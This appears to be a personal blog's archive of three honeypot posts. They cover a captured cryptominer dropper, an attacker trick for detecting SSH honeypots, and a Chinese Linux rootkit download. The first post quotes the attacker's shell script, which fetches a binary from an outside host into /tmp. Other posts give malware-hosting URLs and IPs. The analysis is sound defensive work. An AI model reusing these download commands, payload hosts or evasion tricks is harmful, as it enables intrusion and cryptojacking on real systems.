Posts Tagged ‘honeypot’

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:

{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Tags: , ,
Posted in Bots, Honeypots | No Comments »

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

Tags: , , , , , ,
Posted in Honeypots | No Comments »

chinese linux-rootkit

Friday, July 18th, 2014

Once in a while I take a look in the downloaded files from the ssh-honeypot.

Lately I saw a download of “linux-2.6.27.el6” which made we wonder.

If you are interested: There are more files available for  download at http://222.186.15.13:8520/

..-probably all trojans and rootkits..

The known protocols of that kit include even gopher 🙂

gopher
http
https
file
news
mailto
socks

A short “string” on that file showed a lot of chinese ip-addresses, plus some replaced commands (netstat, ps, lsof) and a few additional options:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe
7CSerial

short excerpt: (maybe these addresses are known elsewhere?

203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33….and so on..

Tags: , , ,
Posted in Honeypots | No Comments »